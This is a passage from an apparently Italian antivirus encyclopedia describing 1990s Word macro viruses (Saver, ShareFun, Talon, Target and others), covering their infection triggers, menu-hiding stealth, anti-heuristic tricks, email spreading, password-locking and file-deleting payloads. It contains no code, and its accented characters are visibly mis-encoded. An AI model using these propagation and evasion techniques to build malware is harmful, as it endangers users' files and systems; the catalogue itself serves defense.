Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: DateiSpeichern Lunghezza della Macro: 602 Byte Paese di origine: Austria Data di origine: Settembre 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Saver viene avviato quando un documento infetto Φ salvato (DateiSpeichern). non infetta quando Φ giα presente la macro "DateiSpeichern" nel modello di documento principale. Lo stesso Φ valido per i documenti. Attivando il virus il 21 Aprile 21st mostra il seguente messaggio: " Saver(SEX) written by Spooky. Austria 1996 " [Word_ShareFun.A] Nome del virus: Word.ShareFun.A Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: No Nomi delle Macro: AutoExec, AutoOpen, File/Esci, File/Apri, File/Salva FileClose, Strumenti/Macro, FileTemplates, ShareTheFun Lunghezza della Macro: 1777 Paese di origine: USA Data di origine: 1997 Payload: Si Rilevato In The Wild: Si Descrizione: ShareFun infetta il modello di documento principale quando un documento infetto Φ aperto (AutoOpen). Altri documenti sono infettati quando vengono aperti (File/Apri), salvati (File/Salva), chiusi (FileClose) o attivando File/Esci, Strumenti/Macro e FileTemplates. Quando viene aperto un documento infetto, Φ chiamata la macro "ShareTheFun" (probabilitα del 25%) ed il documento Φ salvato nella directory principale con il nome: "Doc1.doc" DopodichΘ ShareFun cerca una copia attiva di MSMail. Ci sono due diverse possibilitα: 1. MSMail Φ inattivo Result: Sharefun chiude Windows. 2. MSMail Φ attivo Risultato: Sharefun cerca di prendere il controllo di MSMail e spedisce 3 e-mail a 3 nomi scelti a caso dalla rubrica. Attaccata alla e-mail, con l'intestazione "You have GOT to read this!", c'Φ il documento infetto. Cos∞ facendo ShareFun cerca di diffondersi a nuovi utenti. Queste due procedure non sempre lavorano corettamente. ShareFun usa anche "Strumenti/Macro"e "FileTemplates" per rendere l'identificazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Anche se ShareFun fu lanciato dalla divisione marketing Di una compagnia che produce anti-virus, Φ molto difficile che si possa essere infettati da questo virus. Rimane un virus da ricerca. [Word_ShareFun] Nome del virus: Word.ShareFun Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: No Nomi delle Macro: Lunghezza della Macro: Paese di origine: Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Questo virus ha 9 macro, tutte criptate. Questo virus usa "Strumenti/Macro" per rendere l'identificazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Le macro sono: "AutoExec" "AutoOpen" "File/Esci" "File/Apri" "File/Salva" "FileClose" "Strumenti/Macro" "ShareTheFun" "FileTemplates" La macroAutoExec imposta DisableAutoMacro, mentre AutoOpen Seleziona a caso, con il 25% di probabilitα, per agganciare ShareTheFun. La macro Save all copia le macro sopra riportate nel modello di documento principale (NORMAL.DOT) e nel file new/open. (Rilevato da MacroTrap's rule1.) Quanto segue descrive le funzioni delle altre macro 1) File/Esci: intercetta la submacro Saveall di AutoOpen 2) File/Apri: intercetta la submacro Saveall di AutoOpen 3) File/Salva: intercetta la submacro Saveall di AutoOpen 4) FileClose : intercetta la submacro Saveall di AutoOpen 5) Strumenti/Macro: disabilita Strumenti/Macro ed intercetta la submacro Saveall di AutoOpen 6) ShareTheFun : controlla che MSMail sia attivo. Se lo Φ intercetta MSMail e spedisce 3 e-mail a 3 nomi scelti a caso dalla rubrica. Attaccata alla e-mail, con l'intestazione "You have GOT to read this!", c'Φ il documento infetto. 7) FileTemplates: intercetta la submacro Saveall di AutoOpen [Word_Showoff.A (Showofxx)] Nome del virus: Word.Showoff.A (Showofxx) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Lunghezza della Macro: 6789 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: No Rilevato In The Wild: No Descrizione: Showoff infetta il modello di documento principale (normal.dot) quando un file infetto Φ aperto. Altri documenti divengono infetti Quando sono chiusi. Showoff.A Φ la piu probabilmente la mutazione corrotta di un altro virus. La macro "Show" (macro "AutoExec" dopo aver infettato il modello di documento principale) contiene delle istruzioni non valide di Wordbasic. A causa di queste istruzioni, Showoff mostra i seguenti messaggi d'errore quando viene avviato Word: " Out of Memory " Microsoft Word non Φ afflitto con informazioni parassite, questo virus pu≥ infettare altri documenti. [Word.Showoff.B (Showofxx)] Nome del virus: Word.Showoff.B (Showofxx) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Lunghezza della Macro: 7955 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Payload: No Rilevato In The Wild: No Descrizione: Showoff.B infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono chiusi. La macro "Show" (macro "AutoExec" dopo aver infettato il modello di documento principale) contiene istruzioni corrotte per WordBasic. A causa di queste informazioni, Showoff mostra un messaggio d'errore. Microsoft Word non Φ infettato con macro alterate, questo virus Φ in grado di infettare altri documenti. [Word_Showoff.C (Showofxx)] Nome del virus: Word.Showoff.C (Showofxx) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Lunghezza della Macro: 4758 Byte Paese di origine: Australia Data di origine: Gennaio 1997 Payload: No Rilevato In The Wild: Si Descrizione: ShowOff.C Φ il virus originale della famiglia di virus ShowOff. Altre varianti corrotte sono basate sul suo codice (come ShowOff.A eB). ShowOff.C infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono chiusi. Come altri virus di macro, ShowOff.C non contiene nessuna altra procedura distruttiva. Mostra solo alcuni messaggi. [Word_ShowOff.D] Nome del virus: Word.ShowOff.D Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, Show, Cfxx Lunghezza della Macro: 6789 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e l'originale virus ShowOff Φ che la macro "Show" (AutoExec nel modello di documento principale) Φ corrotta. A causa di ci≥, Microsoft Word mostra i seguenti messaggi d'errore quando viene avviato Word: " Out of memoria " Nonostante questo errore, ShowOff.D Φ in grado di diffondersi ed infettare altri documenti. Per ulteriori informazioni, vedere la descrizione di ShowOff.A. [Word_Showoff.E (Showofxx)] Nome del virus: Word.Showoff.E (Showofxx) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Lunghezza della Macro: 7955 Byte Paese di origine: Europe Data di origine: Gennaio 1997 Payload: Si Rilevato In The Wild: No Descrizione: Showoff.E infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono chiusi. Showoff.E unito con il virus Bandung, usano le proprie macro distruttive "AutoExec". La macro "Show" AutoExec nel modello di documento principale) contiene il codice distruttivo, che si attiva quando Φ avviato Microsoft Word. Per ulteriori informazioni, vedere la descrizione di Bandung.A virus. [Word_Showoff.F (Showofxx)] Nome del virus: Word.Showoff.F (Showofxx) Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: Si Nomi delle Macro: AutoOpen, Show, Cfxx, (Ofxx, AutoClose, AutoExec) Lunghezza della Macro: 4758 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: No Rilevato In The Wild: No Descrizione: ShowOff.F infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono chiusi. La principale differenza tra questa nuova variante ed i precedenti virus ShowOff Φ che ShowOff.F non mostra il seguente messaggio: " TO ONE OF US, PEACE ! HAPPY BIRTHDAY!!! " [Word_Simple.A (Intended)] Nome del virus: Word.Simple.A (Intended) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, Simple Lunghezza della Macro: 272 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Simple.A Φ un altro virus da macro che non lavora correttamente. Non Φ infettivo, quindi Φ molto difficile che si trovino documenti infettati da lui. [Word_Simple.B ] Nome del virus: Word.Simple.B Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, Simple Lunghezza della Macro: 264 Byte Paese di origine: Sconosciuto Data di origine: Aprile 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Simple.B infetta il modello di documento principale quando un documento infetto Φ aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La principale differenza tra questa nuova variante ed il pi∙ vecchio Simple.A Φ che Simple.B Φ infettivo e mostra il messaggio: " The Concept is Simple! " [Word_Smiley.A] Nome del virus: Word.Smiley.A Tipo di Virus: Virus da macro di Word Numero di Macro: 8 Criptato: Si Nomi delle Macro: AutoExec, AutoExit, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiDrucken, Timer, DateiDruckenStandard Lunghezza della Macro: 6435 Byte Paese di origine: Germania Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: Smiley Φ un altro virus da macro scritto per la versione tedesca di Microsoft Word. Smiley infetta il modello di documento principale (normal.dot) quando un documento infetto viene aperto. Altri documenti sono infettati quando vengono salvati con i comandi DateiSpeichern e DateiSpeichernUnter. Per rendere pi∙ difficile l'identificazione di un documento infetto, Smiley sposta l'opzione Extras/Makro e Datei/Dokumentvorlage (chiamata tecnica macro stealth). Quando si avvia Word (AutoExec), Smiley inserisce la stringa "Smiley=xx" nella sezione [Windows] di win.ini (nella directory Windows). "xx" rappresenta un numero. 14 giorni dopo la prima infezione, Smiley cambia Tools/Options/Userinfo con i seguenti: " Name: Smiley Corporation " " Initials: SC " " Address: Greenpeace " Inoltre, Smiley rimuove i seguenti men∙: Datei/Makro Datei/Dokumentvorlage Ansicht/Symbolleisten Extras/Anpassen 56 dopo la prima infezione, Smiley crea un nuovo file C:\AUTOEXEC.BAT e formatta l'hard drive dopo il successivo. Uscendo da Word (AutoExit), Smiley mostra diversi messaggi e li aggiunge ai documenti stampati. [Word_Snickers.A ] Nome del virus: Word.Snickers.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoOpen, AutoClose Lunghezza della Macro: 420 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Snickers.A non infetta modello di documento principale (normal.dot) a differenza di altri virus da macro. Utilizza un nuovo tipo di infezione (chiamata azione diretta). Infetta i documenti durante i seguenti processi: 1. Un documento infetto Φ aperto. Viene elencato nella lista MRU (Most recently used). 2. Un documento infetto Φ aperto. Il virus cerca di infettare tutta la lista dei file nella lista MRU. Snickers ha un'altra procedura noiosa (AutoClose). Durante l'infezione, cripta il testo scambiando i caratteri adiacenti. Il testo Φ decriptato quando viene aperto un documento infetto (AutoOpen). I virus scanner che rimuovono solo la macro lasciano il documento con il testo criptato. [Word_Spooky.A] Nome del virus: Word.Spooky.A Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: autoexec, AutoOpen, dateidokvorlagen, dateidrucken, dateidruckenstandard, extrasmakro, DateiSpeichernUnter, DateiOeffnen, Spooky Lunghezza della Macro: 3114 Byte Paese di origine: Austria Data di origine: Settembre 1996 Payload: Si Rilevato In The Wild: No Descrizione: Spooky si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando sono aperti (DateiOeffnen) o salvati (DateiSpeichernUnter). Spooky non infetta quando la macro "Spooky" Φ giα presente nel modello di documento principale (normal.dot) o in un documento. Spooky disabilita i men∙ File/Templates e Tools/Macro in modo da rendere pi∙ difficile l'individuazione di un file infetto (chiamata tecnica macro stealth). Se l'utente cerca di selezionare una delle due opzioni viene richiesta una password. Inserendo "ykoops" nei suggerimenti nella barra di stato, riappaiono i men∙ originali. Inserendo una password sbagliata mostra il seguente messaggio: " Sie haben das falsche Passwort eingegeben " tradotto: " Hai inserito una Password sbagliata " Spooky mostra il seguente messaggio nella barra di stato: " Word.Spooky " Quando un utente stampa un documento con l'ora di sistema tra 55 e 59, Spooky inserisce alla fine dei documenti stampati il seguente testo: " Word.Spooky " [Word_Stryx.A ] Nome del virus: Word.Stryx.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: DateiSchliessen, DokumentSchliessen, Stryx1, Stryx2, StryxOne, StryxTwo Lunghezza della Macro: 25669 Byte Paese di origine: Germania Data di origine: Settembre 1996 Payload: Si Rilevato In The Wild: No Descrizione: Mentre Stryx ha 4 macro, alcune sono disponibili solamente nel modello di documento principale o nei documenti. "Stryx1" (solo nel modello di documento principale) "Stryx2" (solo nel modello di documento principale) "StryxOne" (solo nei documenti) "StryxTwo" (solo nei documenti) Stryx Φ attivato quando viene chiuso un documento (DateiSchliessen and DokumentSchliessen). Stryx modifica la sezione "Int1" di win.ini (cartella di Windows). Imposta SI sul valore della stringa installata e crea un'immagine Con estensione *.GIF di un drago (basata su un hex dump). Chiudendo un documento il primo di Dicembre, viene creato un nuovo documento e viene inserita la figura del drago. Seguito dal drago: " STRYX!!!! " " Look at your HD! :-) " " Sorry, but it's so funny! " " NJ 1996 " Stryx non infetta quando la macro "Stryx2" giα esiste nel modello di documento principale o quando la macro "StryxTwo" esiste giα in un documento. [Word_Surabaya.A] Nome del virus: Word.Surabaya.A Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoExec, AutoOpen, Plong, File/Salva con nome Strumenti/Macro, FileTemplates Lunghezza della Macro: 1832 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: Si Descrizione: Surabaya infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono salvati (File/Salva con nome). Surabaya usa Strumenti/Macro e FileTemplates per rendere l'identificazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Avvisiamo di non accedere ai due men∙, dopo che hanno eseguito il codice virale. In caso di Surabaya, essi mostrano un messaggio con " Sorry... ". Ogni volta che Microsoft Word Φ avviato da un modello di documento principale infetto, il seguente messaggio Φ mostrato sulla barra di stato: " Lontong Micro Device ( c ) 1993 By ICE-Man " Surabaya aggiunge il seguente testo "Author" alla sezione C:\WINDOWS\WIN.INI: " Name=TebeYe'93 The ICE-Man " [Word_Switcher.a] Nome del virus: Word.Switcher.a Tipo di Virus: Virus da macro di Word Numero di Macro: 10 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, Autoclose, File/Apri, File/Salva File/Salva con nome, FileClose, FilePrint, FileTemplates, Strumenti/Macro Lunghezza della Macro: 2328 Byte Paese di origine: Sconosciuto Data di origine: Aprile 1997 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Switcher si attiva quando viene aperto un documento infetto. Utilizza "Strumenti/Macro" e "FileTemplates" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Quando un utente seleziona uno dei due men∙, mostra il seguente messaggio: " Configuration conflict - menu item is not available. " Switcher ha alcune procedure distruttive. Quando Φ avviato Microsoft Word (AutoExec), Switcher si avvia (1 probabilitα su 60) e cerca di cancellare quanto segue: " c:\msoffice\excel\*.xls " (Microsoft Excel Spreadsheets) " c:\access\*.mdb " (Microsoft Access database files) " c:\msoffice\access\*.mdb " (Microsoft Access database files) " c:\windows\*.grp " (Windows files) " c:\*.hlp " (Windows Help files) La seconda procedura (allocata in AutoClose) controlla il campo dei secondi e nel caso che il valore sia minore di 10 genera due cifre a caso e cambia tutte le istanze di 1. Esempio: "1" Φ sostituito da "2" nel documento attivo. In pi∙ pu≥ essere trovato il seguente messaggio nella macro "AutoExec": " *** I'm a little pest! *** " " The LITTLE PEST self-propagating macro is by *Sly Ellga*, " " a guy who thinks it's funny to screw around " with other people's data " [Word_Swlabsl (Kit) (a.k.a. 1.0a)] Nome del Virus: Word.Swlabs1 (Kit) (a.k.a. 1.0a) Tipo di Virus: Virus da macro di Word Size of executable: 117,248 Byte Paese di origine: USA Data di origine: Gennaio 1997 Descrizione: Swlabs1 Φ un altro kit di costruzione per Microsoft Word scritto con Microsoft Visual C++ per Win32. Si presenta come un editore di testi con la creazione di un virus guidata. Ci sono due metodi per creare nuovi virus: 1. Solamente le istruzioni virali, in caso non venga trovata una copia di Microsoft Word. 2. Piena funzionalitα del virus da macro se Φ trovato Microsoft Word. Swlabs1 utilizza il documento "SKAMMY.DOC" quando comunica con Microsoft Word. Contiene la macro "Test" (2137 Byte), che incolla la sorgente dalla clipboard, le mette in diverse macro esce da Word e torna al kit Swlabs. [Word_Swlabs.A (aka. Skam)] Nome del virus: Word.Swlabs.A (aka. Skam) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 512 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: Si Descrizione: Swlabs.A infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono aperti (AutoOpen). Swlabs.A rimuove Strumenti/Macro e FileTemplates per rendere l'individuazione di un file infetto pi∙ difficile (chiamata tecnica macro stealth). Non contiene nessuna procedura , ma solamente il seguente commento: " What" No Payload? WUSSY! " Swlabs.A Φ un altro virus che fu creato con un generatore di virus da macro. [Word_Swlabs.B] Nome del virus: Word.Swlabs.B Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: No Nomi delle Macro: AutoOpen, File/Nuovo, File/Salva Lunghezza della Macro: 2145 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Swlabs.B infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen), creati (File/Nuovo), o salvati (File/Salva). Swlabs.B Non contiene nessuna procedura distruttiva, ma solamente il seguente commento che Φ aggiunto alla sezione File|Properties\Summary|Subject: " Green Bay Packers -- Super Bowl XXXI Champions " Swlabs.B Φ un altro virus che fu creato con un generatore di virus da macro. [Word_Talon.A] Nome del virus: Word.Talon.A Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: AOB, Deed, FSAB, Info, AutoOpen (File/Salva con nome), Strumenti/Macro Lunghezza della Macro: 2052 Byte nei documenti 2008 Byte in modello di documento principale Paese di origine: USA Data di origine: Marzo 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome). Talon si attiva il 18 Giugno. Poi mostra un'infinita serie di messaggi: " Your System Is Infected With The Macro Virus Talon #1! " " This Macro Virus Was Brought To You By: TALON 1997 ". Quando l'utente cerca di selezionare dal menu opzioni "Strumenti/Macro", Talon mostra la seguente informazione: " Warning " " This Option Is Not Available, Please Insert The MS-Office CD " " And Install The Help Files To Continue. " Pi∙ informazioni possono essere trovate nella macro "Info": " ********************************************* " " Talon #1 " " June 18 Payload Activates " " Displays Message " " All Files Criptato Except Info File " " " " Brought To You By " " "Talon" " " ********************************************* " [Word_Talon.B] Nome del virus: Word.Talon.B Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: AOB, FSAB, Info, AutoOpen (File/Salva con nome), Strumenti/Macro, Password Lunghezza della Macro: 1953 Byte nei documenti 1887 Byte in modello di documento principale Paese di origine: USA Data di origine: Marzo 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.B infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome). Si attiva il 27 di ogni mese quando salva il documento attivo con la password " talon " e mostra il il seguente messaggio: " Warning " " Your document Has Just been Been Saved, I Hope You Know " " The Password!!! ", Brought To You By Talon 1997 " Un'altra differenza tra questa nuova variante e l'originale virus Talon Φ che il men∙ opzioni di "Strumenti/Macro" mostra la seguente informazione: " This Option Is Not Available, Please Install The " " Help Files To Continue. " [Word_Talon.C] Nome del virus: Word.Talon.C Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: AOB, FSAB, Info, AutoOpen (File/Salva con nome), Strumenti/Macro, ToolsSpelling Lunghezza della Macro: 2001 Byte nei documenti 1981 Byte in modello di documento principale Paese di origine: USA Data di origine: Marzo 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.C infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome). Si attiva di luned∞ durante il mese di Giugno. Questo accade solo quando un utente utilizza lo spell checker. Talon.C quindi salva il documento attivo con la password " talon3 " ed manda tre caselle di messaggi: " I Have A Word For You To Spell V I R U S " " Your document Has Just been Been Saved By The Virus da macro di Word " " Talon #3, I Hope You Know The Password!!! " " Brought To You By Talon 1997 " Un'altra differenza tra questa nuova variante e l'originale virus Talon Φ che il men∙ opzioni di "Strumenti/Macro" mostra la seguente informazione: " This option is not available now. Please install the " " HELP files To continue. " [Word_Talon.D] Nome del virus: Word.Talon.D Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: Scramble, AutoClose, Info, AutoOpen, File/Salva con nome, Strumenti/Macro Lunghezza della Macro: 2079 Byte Paese di origine: USA Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.D infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome) o chiusi (AutoClose). Si attiva di venerd∞ quando salva il documento attivo con la password " talon4 " e mostra i seguenti messaggi: " Your document Is Infected With The Macro Virus Talon 4 " " Your document Has Just been Been Saved, I Hope You Know " " The Password!!! ", " Talon Strikes Again 1997 " Un'altra differenza tra questa nuova variante e l'originale virus Talon Φ che il men∙ opzioni di "Strumenti/Macro" mostra la seguente informazione: " This option is not available right now. Please install the " " HELP files To continue. " [Word_Talon.E] Nome del virus: Word.Talon.E Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: Scramble, AutoClose, Info, Menu, AutoOpen, File/Salva con nome, Strumenti/Macro Lunghezza della Macro: 2323 Byte Paese di origine: USA Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.E infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome) o chiusi (AutoClose). La principale differenza tra questa nuova variante ed i precedenti virus Talon Φ che questo virus aggiunge un nuovo men∙ (Talon). Quando un utente seleziona l'elemento, Talon.E si avvia ed il documento attivo viene salvato con la password " talon5 ". DopodichΘ mostra diversi messaggi: " Thank You so Much For Pressing That Button, " " I Thought I Would Never Be Activated. " " Virus da macro di Word Talon 5 " " Talon Strikes Again " Un'altra differenza tra questa nuova variante e l'originale virus Talon Φ che il men∙ opzioni di "Strumenti/Macro" mostra la seguente informazione: " This option is not available right now. Please install the " " HELP files To continue. " [Word_Talon.F] Nome del virus: Word.Talon.F Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: Scramble, AutoClose, Info, AutoOpen, File/Salva con nome, Strumenti/Macro Lunghezza della Macro: 2194 Byte Paese di origine: USA Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.F infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome) o chiusi (AutoClose). La principale differenza tra questa nuova variante ed i precedenti virus Talon Φ che l'autore del virus tent≥ la tecnica "anti-heuristic". Un'altra differenza tra questa nuova variante e l'originale virus Talon Φ che il men∙ opzioni di "Strumenti/Macro" mostra la seguente informazione: " Please Install The HELP Files To Continue " " Option Not Installed " [Word_Talon.G] Nome del virus: Word.Talon.G Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: No Nomi delle Macro: Scramble, AutoClose, Scramble2, AutoOpen, File/Salva con nome, Strumenti/Macro, Mentor Lunghezza della Macro: 6280 Byte Paese di origine: USA Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.G infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome) o chiusi (AutoClose). La principale differenza tra questa nuova variante ed i precedenti virus Talon Φ che Talon.G aggiunge due men∙ al file Help (chiamati "Talon 5" e "About Talon 5"). Quando selezionati, Talon si avvia e mostra un articolo dell'autore dei virus da macro di Microsoft Word. Poi stampa 999 copie dell'articolo e mostra i seguenti messaggi: " Talon Strikes Again " " Virus da macro di Word Talon 5 AKA The Mentor " [Word_Talon.H] Nome del virus: Word.Talon.H Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoClose, AutoOpen, Crud, File/Salva con nome Lunghezza della Macro: 1923 Byte Paese di origine: USA Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Talon.H infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto (AutoOpen). Altri documenti si infettano quando vengono salvati (File/Salva con nome) o chiusi (AutoClose). La principale differenza tra questa nuova variante ed i precedenti virus Talon Φ che Talon.H aggiunge un men∙ (called Eifel Crud). Quando selezionato, Talon.H si avvia e salva il documento attivo con la password " crud ". DopodichΘ crea un nuovo documento con il seguente testo: " You are infected with the Eifel Crud! " " Talon Strikes Again! 1997 " Talon.H Φ un altro virus che si trasforma in Talon.H1 e Talon.H2. Questo avviene chiudendo un documento infettato da Talon.H (AutoClose) e salvando un file infettato da Talon.H1 (File/Salva con nome). A causa della perdita di due macro, Talon.H1 e Talon.H2 producono dei messaggi d'errore di WordBasic. [Word_Target.B (a.k.a LoneStar, Lone)] Nome del virus: Word.Target.B (a.k.a LoneStar, Lone) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 (German version of Word) 2 (Any other version of Word) Criptato: Si Nomi delle Macro: LoneRaider (LoneRaiderTwo) Lunghezza della Macro: 3463 Byte Paese di origine: Germania Data di origine: Sconosciuta Distruttivo: No Rilevato In The Wild: No Target si attiva quando viene premuto il tasto associato (SPACE). Target Φ un tentativo di ingannare gli euristici scanner dei virus da macro.. Le sue macro non contengono comandi per copiare i virus. Invece crea una seconda macro (LoneRaiderTwo) e vi copia dentro tutti comandi per l'attivazione e l'infezione. Dopo l'esecuzione la seconda macro Φ disattivata. Come risultato, Φ che alcuni scanner non riconoscono i flag di Target come sospetti. Quando Target Φ attivato da una versione non tedesca di Microsoft Word, non si diffonde e la seconda macro non viene cancellata Premendo "SPACE" il primo di Gennaio di ogni anno, Target Crea un nuovo documento con il seguente testo: " Enjoy the first F/WIN Killer! " " LoneRaider! " " Nightmare Joker " " 1996 " Quando Target fu rilasciato al pubblico, F-WIN Heuristic Anti-Virus, scritto da Stefan Kurtzhals, fu incapace di rilevare Target per le ragioni sopra dette. Questo fu cambiato immediatamente ed ogni aggiornamento di programmi antivirus dovrebbe essere in grado di individuarlo. [Word_Tear.A] Nome del virus: Word.Tear.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, File/Salva con nome) Lunghezza della Macro: 1684 Byte Paese di origine: Russia Data di origine: Aprile 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Tear.A infetta il modello di documento principale (normal.dot) quando un Φ aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva con nome). I seguenti messaggi possono essere trovati nel codice della macro "AutoOpen": " (c) 1997 Master of Infection " " QUEEN FOREVER!!! " " I love you,Freddie!!! " " Here is my Mother's love!!! " " I don't want to sleep with you " " I don't need the passion too " " I don't want a stormy affair " " To make me feel my life is heading somewhere " " All I want is comfort and care " " Just to know that my woman gives me sweet - " " Mother Love " " I've walked too long in this lonely lane " " I've had enough of this same old game " " I'm a man of the world and they say that I'm strong " " But my heart is heavy, and my hope is gone " " Out in the city, in the cold world outside " " I don't want to pity, just a safe place to hide " " Mama please, let me back inside " " I don't want to make no waves " " But you can give me all the love that I crave " " I can't take it if you see me cry " " I long for peace before I die " " All I want is to know that you're there " " You're gonna give me all your sweet - " " Mother Love " " My body's aching, but I can't sleep " " My dreams are all the company I keep " " Got such a feeling as the sun goes down " " I'm coming home to my sweet - " " Mother Love " Quando viene aperto un documento infetto, Tear mostra il seguente messaggio: " Tear it up! " [Word_Tedious.A] Nome del virus: Word.Tedious.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoNew, File/Salva con nome, VAutoNew, VFile/Salva con nome Lunghezza della Macro: 1082 Byte Paese di origine: Sconosciuto Data di origine: Agosto 1996 Payload: No Rilevato In The Wild: No Descrizione: Tedious infetta i documenti quando Φ usato il comando "File/Salva con nome". I documenti infetti sono trasformati in file di modello evenienza molto comune per i virus da macro. Dato Tedious usa i nomi delle macro in inglese lavora solo con la versione inglese di Microsoft Word. Anche se una delle maggiori compagnie americane di anti-virus sostenga che Tedious sia distruttivo, gli utenti non devono temere questo virus. Tedious Φ senza armi e non fa niente altro che replicarsi. [Word_Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)] Nome del virus: Word.Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex) Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, DateiBeenden, 